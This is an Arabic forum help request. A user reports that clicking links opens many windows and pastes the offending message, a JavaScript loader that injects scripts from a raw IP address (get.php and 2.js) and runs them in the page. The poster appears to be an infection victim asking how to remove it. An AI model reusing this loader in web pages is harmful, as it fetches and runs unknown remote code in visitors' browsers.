[[Template core/front/global/updateWarning is throwing an error. This theme may be out of date. Run the support tool in the AdminCP to restore the default theme.]]
عند الضغط على أي لينك في صفحة نت تفتح نوافذ كثيرة جدا وكلها بها هذه الرسالة
loadScript("http://37.59.72.131/get.php", myPrettyCode);
loadScript("http://37.59.72.131/2.js", myPrettyCode);
function loadScript(url, callback)
{
// Adding the script tag to the head as suggested before
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = url;
// Then bind the event to the callback function.
// There are several events for cross browser compatibility.
script.onreadystatechange = callback;
script.onload = callback;
// Fire the loading
head.appendChild(script);
}
var myPrettyCode = function() {
// Here, do what ever you want
};
تم النشر منذ
عند الضغط على أي لينك في صفحة نت تفتح نوافذ كثيرة جدا وكلها بها هذه الرسالة
فكيف أتخلص منها؟
شارك هذا الرد
رابط المشاركة
شارك الرد من خلال المواقع ادناه